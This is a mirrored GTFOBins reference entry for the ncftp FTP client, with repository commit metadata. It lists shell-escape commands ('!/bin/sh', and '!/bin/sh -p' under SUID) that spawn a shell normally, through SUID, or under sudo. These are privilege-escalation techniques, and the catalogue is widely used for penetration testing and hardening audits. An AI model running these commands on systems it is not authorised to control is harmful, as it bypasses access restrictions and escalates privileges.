1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/ncftp.md
Miguel R 53b09bd16a
Add ncftp
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2023-03-19 12:14:10 +01:00

16 lines
189 B
Markdown

---
functions:
shell:
- code: |
ncftp
!/bin/sh
suid:
- code: |
./ncftp
!/bin/sh -p
sudo:
- code: |
sudo ncftp
!/bin/sh
---